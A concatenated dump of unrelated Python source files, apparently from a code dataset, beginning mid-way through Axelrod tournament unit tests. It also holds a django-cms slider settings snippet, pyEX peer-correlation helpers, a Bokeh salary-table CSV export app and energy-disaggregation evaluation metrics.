cls.players = [s() for s in test_strategies]
cls.test_name = 'test'
cls.test_repetitions = test_repetitions
cls.test_prob_end = test_prob_end
def test_init(self):
tournament = axelrod.ProbEndTournament(
name=self.test_name,
players=self.players,
game=self.game,
prob_end=self.test_prob_end,
noise=0.2)
self.assertEqual(tournament.match_generator.prob_end, tournament.prob_end)
self.assertEqual(len(tournament.players), len(test_strategies))
self.assertEqual(tournament.game.score(('C', 'C')), (3, 3))
self.assertEqual(tournament.turns, float("inf"))
self.assertEqual(tournament.repetitions, 10)
self.assertEqual(tournament.name, 'test')
self.assertTrue(tournament._with_morality)
self.assertIsInstance(tournament._logger, logging.Logger)
self.assertEqual(tournament.noise, 0.2)
anonymous_tournament = axelrod.Tournament(players=self.players)
self.assertEqual(anonymous_tournament.name, 'axelrod')
@given(tournament=prob_end_tournaments(min_size=2, max_size=5,
min_prob_end=.1,
max_prob_end=.9,
min_repetitions=2,
max_repetitions=4))
@settings(max_examples=50, timeout=0)
@example(tournament=
axelrod.ProbEndTournament(players=[s() for s in test_strategies],
prob_end=.2, repetitions=test_repetitions)
)
# These two examples are to make sure #465 is fixed.
# As explained there: https://github.com/Axelrod-Python/Axelrod/issues/465,
# these two examples were identified by hypothesis.
@example(tournament=
axelrod.ProbEndTournament(players=[axelrod.BackStabber(),
axelrod.MindReader()],
prob_end=.2, repetitions=1))
@example(tournament=
axelrod.ProbEndTournament(players=[axelrod.ThueMorse(),
axelrod.MindReader()],
prob_end=.2, repetitions=1))
def test_property_serial_play(self, tournament):
"""Test serial play using hypothesis"""
# Test that we get an instance of ResultSet
results = tournament.play(progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
self.assertEqual(results.nplayers, len(tournament.players))
self.assertEqual(results.players, [str(p) for p in tournament.players])
class TestSpatialTournament(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.game = axelrod.Game()
cls.players = [s() for s in test_strategies]
cls.test_name = 'test'
cls.test_repetitions = test_repetitions
cls.test_turns = test_turns
cls.test_edges = test_edges
def test_init(self):
tournament = axelrod.SpatialTournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=self.test_turns,
edges=self.test_edges,
noise=0.2)
self.assertEqual(tournament.match_generator.edges, tournament.edges)
self.assertEqual(len(tournament.players), len(test_strategies))
self.assertEqual(tournament.game.score(('C', 'C')), (3, 3))
self.assertEqual(tournament.turns, 100)
self.assertEqual(tournament.repetitions, 10)
self.assertEqual(tournament.name, 'test')
self.assertTrue(tournament._with_morality)
self.assertIsInstance(tournament._logger, logging.Logger)
self.assertEqual(tournament.noise, 0.2)
self.assertEqual(tournament.match_generator.noise, 0.2)
anonymous_tournament = axelrod.Tournament(players=self.players)
self.assertEqual(anonymous_tournament.name, 'axelrod')
@given(strategies=strategy_lists(strategies=deterministic_strategies,
min_size=2, max_size=2),
turns=integers(min_value=1, max_value=20),
repetitions=integers(min_value=1, max_value=5),
noise=floats(min_value=0, max_value=1),
seed=integers(min_value=0, max_value=4294967295))
@settings(max_examples=50, timeout=0)
def test_complete_tournament(self, strategies, turns, repetitions,
noise, seed):
"""
A test to check that a spatial tournament on the complete multigraph
gives the same results as the round robin.
"""
players = [s() for s in strategies]
# edges
edges = []
for i in range(0, len(players)):
for j in range(i, len(players)):
edges.append((i, j))
# create a round robin tournament
tournament = axelrod.Tournament(players, repetitions=repetitions,
turns=turns, noise=noise)
# create a complete spatial tournament
spatial_tournament = axelrod.SpatialTournament(players,
repetitions=repetitions,
turns=turns,
noise=noise,
edges=edges)
axelrod.seed(seed)
results = tournament.play(progress_bar=False)
axelrod.seed(seed)
spatial_results = spatial_tournament.play(progress_bar=False)
self.assertEqual(results.ranked_names, spatial_results.ranked_names)
self.assertEqual(results.nplayers, spatial_results.nplayers)
self.assertEqual(results.nrepetitions, spatial_results.nrepetitions)
self.assertEqual(results.payoff_diffs_means,
spatial_results.payoff_diffs_means)
self.assertEqual(results.payoff_matrix, spatial_results.payoff_matrix)
self.assertEqual(results.payoff_stddevs, spatial_results.payoff_stddevs)
self.assertEqual(results.payoffs, spatial_results.payoffs)
self.assertEqual(results.cooperating_rating,
spatial_results.cooperating_rating)
self.assertEqual(results.cooperation, spatial_results.cooperation)
self.assertEqual(results.normalised_cooperation,
spatial_results.normalised_cooperation)
self.assertEqual(results.normalised_scores,
spatial_results.normalised_scores)
self.assertEqual(results.good_partner_matrix,
spatial_results.good_partner_matrix)
self.assertEqual(results.good_partner_rating,
spatial_results.good_partner_rating)
def test_particular_tournament(self):
"""A test for a tournament that has caused failures during some bug
fixing"""
players = [axelrod.Cooperator(), axelrod.Defector(),
axelrod.TitForTat(), axelrod.Grudger()]
edges = [(0, 2), (0, 3), (1, 2), (1, 3)]
tournament = axelrod.SpatialTournament(players, edges=edges)
results = tournament.play(progress_bar=False)
expected_ranked_names = ['Cooperator', 'Tit For Tat',
'Grudger', 'Defector']
self.assertEqual(results.ranked_names, expected_ranked_names)
# Check that this tournament runs with noise
tournament = axelrod.SpatialTournament(players, edges=edges, noise=.5)
results = tournament.play(progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
class TestProbEndingSpatialTournament(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.game = axelrod.Game()
cls.players = [s() for s in test_strategies]
cls.test_name = 'test'
cls.test_repetitions = test_repetitions
cls.test_prob_end = test_prob_end
cls.test_edges = test_edges
def test_init(self):
tournament = axelrod.ProbEndSpatialTournament(
name=self.test_name,
players=self.players,
game=self.game,
prob_end=self.test_prob_end,
edges=self.test_edges,
noise=0.2)
self.assertEqual(tournament.match_generator.edges, tournament.edges)
self.assertEqual(len(tournament.players), len(test_strategies))
self.assertEqual(tournament.game.score(('C', 'C')), (3, 3))
self.assertEqual(tournament.turns, float("inf"))
self.assertEqual(tournament.repetitions, 10)
self.assertEqual(tournament.name, 'test')
self.assertTrue(tournament._with_morality)
self.assertIsInstance(tournament._logger, logging.Logger)
self.assertEqual(tournament.noise, 0.2)
self.assertEqual(tournament.match_generator.noise, 0.2)
self.assertEqual(tournament.prob_end, self.test_prob_end)
anonymous_tournament = axelrod.Tournament(players=self.players)
self.assertEqual(anonymous_tournament.name, 'axelrod')
@given(strategies=strategy_lists(strategies=deterministic_strategies,
min_size=2, max_size=2),
prob_end=floats(min_value=.1, max_value=.9),
reps=integers(min_value=1, max_value=3),
seed=integers(min_value=0, max_value=4294967295))
@settings(max_examples=50, timeout=0)
def test_complete_tournament(self, strategies, prob_end,
seed, reps):
"""
A test to check that a spatial tournament on the complete graph
gives the same results as the round robin.
"""
players = [s() for s in strategies]
# edges
edges = [(i, j) for i in range(len(players))
for j in range(i, len(players))]
# create a prob end round robin tournament
axelrod.seed(seed)
tournament = axelrod.ProbEndTournament(players, prob_end=prob_end,
repetitions=reps)
results = tournament.play(progress_bar=False)
# create a complete spatial tournament
axelrod.seed(seed)
spatial_tournament = axelrod.ProbEndSpatialTournament(players,
prob_end=prob_end,
repetitions=reps,
edges=edges)
spatial_results = spatial_tournament.play(progress_bar=False)
self.assertEqual(results.match_lengths, spatial_results.match_lengths)
self.assertEqual(results.ranked_names, spatial_results.ranked_names)
self.assertEqual(results.wins, spatial_results.wins)
self.assertEqual(results.scores, spatial_results.scores)
self.assertEqual(results.cooperation,
spatial_results.cooperation)
@given(tournament=spatial_tournaments(strategies=axelrod.basic_strategies,
max_turns=1, max_noise=0,
max_repetitions=3),
seed=integers(min_value=0, max_value=4294967295))
@settings(max_examples=50, timeout=0)
def test_one_turn_tournament(self, tournament, seed):
"""
Tests that gives same result as the corresponding spatial round robin
spatial tournament
"""
prob_end_tour = axelrod.ProbEndSpatialTournament(tournament.players,
prob_end=1,
edges=tournament.edges,
repetitions=tournament.repetitions)
axelrod.seed(seed)
prob_end_results = prob_end_tour.play(progress_bar=False)
axelrod.seed(seed)
one_turn_results = tournament.play(progress_bar=False)
self.assertEqual(prob_end_results.scores,
one_turn_results.scores)
self.assertEqual(prob_end_results.wins,
one_turn_results.wins)
self.assertEqual(prob_end_results.cooperation,
one_turn_results.cooperation)
|
py | 1a40da9d2ec09d98598ec535035483d918ba42e0 | from django.conf import settings
static_url = getattr(settings, 'STATIC_URL', '/static/')
app_settings = getattr(settings, 'COMPLETE_SLIDER', {})
if 'JS_URL' not in app_settings:
app_settings['JS_URL'] = static_url + 'djangocms_complete_slider/js/vegas.js'
if 'CSS_URL' not in app_settings:
app_settings['CSS_URL'] = static_url + 'djangocms_complete_slider/css/vegas.min.css'
|
py | 1a40dc49ffb962ed6704948505ea85dcf9ecad67 | # *****************************************************************************
#
# Copyright (c) 2020, the pyEX authors.
#
# This file is part of the pyEX library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
def peerCorrelation(client, symbol, range="6m"):
"""This will return a dataframe of peer correlations for the given symbol across
the given range
Args:
client (pyEX.Client): Client
symbol (string): Ticker
range (string): range to use, for pyEX.chart
Returns:
DataFrame: result
"""
peers = client.peers(symbol)
rets = client.batchDF(peers + [symbol], "chart", range)["chart"]
ret = rets.pivot(columns="symbol", values="changePercent").corr()
ret.index.name = "symbol"
ret.columns = ret.columns.tolist()
return ret
def peerCorrelationPlot(client, symbol, range="6m"):
"""This will plot a dataframe of peer correlations for the given symbol across
the given range
Note: this function requires the use of `seaborn.heatmap`
Args:
client (pyEX.Client): Client
symbol (string): Ticker
range (string): range to use, for pyEX.chart
Returns:
DataFrame: result
"""
import seaborn as sns
return sns.heatmap(peerCorrelation)
|
py | 1a40dc838fb82953b33c27706c21b9ffa299dfa3 | from os.path import dirname, join
import pandas as pd
from bokeh.layouts import row, column
from bokeh.models import ColumnDataSource, CustomJS
from bokeh.models.widgets import RangeSlider, Button, DataTable, TableColumn, NumberFormatter
from bokeh.io import curdoc
df = pd.read_csv(join(dirname(__file__), 'salary_data.csv'))
source = ColumnDataSource(data=dict())
def update():
current = df[(df['salary'] >= slider.value[0]) & (df['salary'] <= slider.value[1])].dropna()
source.data = {
'name' : current.name,
'salary' : current.salary,
'years_experience' : current.years_experience,
}
slider = RangeSlider(title="Max Salary", start=10000, end=110000, value=(10000, 50000), step=1000, format="0,0")
slider.on_change('value', lambda attr, old, new: update())
button = Button(label="Download", button_type="success")
button.js_on_click(CustomJS(args=dict(source=source),
code=open(join(dirname(__file__), "download.js")).read()))
columns = [
TableColumn(field="name", title="Employee Name"),
TableColumn(field="salary", title="Income", formatter=NumberFormatter(format="$0,0.00")),
TableColumn(field="years_experience", title="Experience (years)")
]
data_table = DataTable(source=source, columns=columns, width=800)
controls = column(slider, button)
curdoc().add_root(row(controls, data_table))
curdoc().title = "Export CSV"
update()
|
py | 1a40dccd9fb4df64f8945e737fc82e71b871533b | from Logger import log
import numpy as np
# from sklearn.metrics import confusion_matrix
def get_TP(target, prediction, threshold):
'''
compute the number of true positive
Parameters:
----------------
target: the groud truth , np.array
prediction: the prediction, np.array
threshold: float
'''
assert (target.shape == prediction.shape)
target = 1 - np.clip(target, threshold, 0) / threshold
prediction = 1 - np.clip(prediction, threshold, 0) / threshold
tp_array = np.logical_and(target, prediction) * 1.0
tp = np.sum(tp_array)
return tp
def get_FP(target, prediction, threshold):
'''
compute the number of false positive
Parameters:
----------------
target: the groud truth , np.array
prediction: the prediction, np.array
threshold: float
'''
assert (target.shape == prediction.shape)
target = np.clip(target, threshold, 0) / threshold
prediction = 1 - np.clip(prediction, threshold, 0) / threshold
fp_array = np.logical_and(target, prediction) * 1.0
fp = np.sum(fp_array)
return fp
def get_FN(target, prediction, threshold):
'''
compute the number of false negtive
Parameters:
----------------
target: the groud truth , np.array
prediction: the prediction, np.array
threshold: float
'''
assert (target.shape == prediction.shape)
target = 1 - np.clip(target, threshold, 0) / threshold
prediction = np.clip(prediction, threshold, 0) / threshold
fn_array = np.logical_and(target, prediction) * 1.0
fn = np.sum(fn_array)
return fn
def get_TN(target, prediction, threshold):
'''
compute the number of true negative
Parameters:
----------------
target: the groud truth , np.array
prediction: the prediction, np.array
threshold: float
'''
assert (target.shape == prediction.shape)
target = np.clip(target, threshold, 0) / threshold
prediction = np.clip(prediction, threshold, 0) / threshold
tn_array = np.logical_and(target, prediction) * 1.0
tn = np.sum(tn_array)
return tn
def get_recall(target, prediction, threshold):
'''
compute the recall rate
Parameters:
----------------
target: the groud truth , np.array
prediction: the prediction, np.array
threshold: float
'''
tp = get_TP(target, prediction, threshold)
fn = get_FN(target, prediction, threshold)
log('tp={0}'.format(tp))
log('fn={0}'.format(fn))
if tp + fn <= 0.0:
recall = tp / (tp + fn + 1e-9)
else:
recall = tp / (tp + fn)
return recall
def get_precision(target, prediction, threshold):
'''
compute the precision rate
Parameters:
----------------
target: the groud truth , np.array
prediction: the prediction, np.array
threshold: float
'''
tp = get_TP(target, prediction, threshold)
fp = get_FP(target, prediction, threshold)
log('tp={0}'.format(tp))
log('fp={0}'.format(fp))
if tp + fp <= 0.0:
precision = tp / (tp + fp + 1e-9)
else:
precision = tp / (tp + fp)
return precision
def get_F1(target, prediction, threshold):
'''
compute the F1 score
Parameters:
----------------
target: the groud truth , np.array
prediction: the prediction, np.array
threshold: float
'''
recall = get_recall(target, prediction, threshold)
log(recall)
precision = get_precision(target, prediction, threshold)
log(precision)
if precision == 0.0 or recall == 0.0:
f1 = 0.0
else:
f1 = 2 * precision * recall / (precision + recall)
return f1
def get_accuracy(target, prediction, threshold):
'''
compute the accuracy rate
Parameters:
----------------
target: the groud truth , np.array
prediction: the prediction, np.array
threshold: float
'''
tp = get_TP(target, prediction, threshold)
tn = get_TN(target, prediction, threshold)
accuracy = (tp + tn) / target.size
return accuracy
def get_relative_error(target, prediction):
'''
compute the relative_error
Parameters:
----------------
target: the groud truth , np.array
prediction: the prediction, np.array
'''
assert (target.shape == prediction.shape)
return np.mean(np.nan_to_num(np.abs(target - prediction) / np.maximum(target, prediction)))
def get_abs_error(target, prediction):
'''
compute the absolute_error
Parameters:
----------------
target: the groud truth , np.array
prediction: the prediction, np.array
'''
assert (target.shape == prediction.shape)
data = np.abs(target - prediction)
mean, std, min_v, max_v, quartile1, median, quartile2 = get_statistics(data)
return mean, std, min_v, max_v, quartile1, median, quartile2, data
def get_nde(target, prediction):
'''
compute the normalized disaggregation error
Parameters:
----------------
target: the groud truth , np.array
prediction: the prediction, np.array
'''
return np.sum((target - prediction) ** 2) / np.sum((target ** 2))
def get_sae(target, prediction, sample_second):
'''
compute the signal aggregate error
sae = |\hat(r)-r|/r where r is the ground truth total energy;
\hat(r) is the predicted total energy.
'''
r = np.sum(target * sample_second * 1.0 / 3600.0)
rhat = np.sum(prediction * sample_second * 1.0 / 3600.0)
sae = np.abs(r - rhat) / np.abs(r)
return sae
def get_Epd(target, prediction, sample_second):
'''
Energy per day
- calculate energy of a day for both ground truth and prediction
- sum all the energies
- divide by the number of days
'''
day = int(24.0 * 3600 / sample_second) #how many rows per day
gt_en_days = []
pred_en_days = []
for start in range(0, int(len(target)-day), int(day)):
gt_en_days.append(np.sum(target[start:start+day]*sample_second)/3600)
pred_en_days.append(np.sum(prediction[start:start+day]*sample_second)/3600)
Epd = np.sum(np.abs(np.array(gt_en_days)-np.array(pred_en_days)))/(len(target)/day)
return Epd
def get_statistics(data):
mean = np.mean(data)
std = np.std(data)
min_v = np.sort(data)[0]
max_v = np.sort(data)[-1]
quartile1 = np.percentile(data, 25)
median = np.percentile(data, 50)
quartile2 = np.percentile(data, 75)
return mean, std, min_v, max_v, quartile1, median, quartile2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.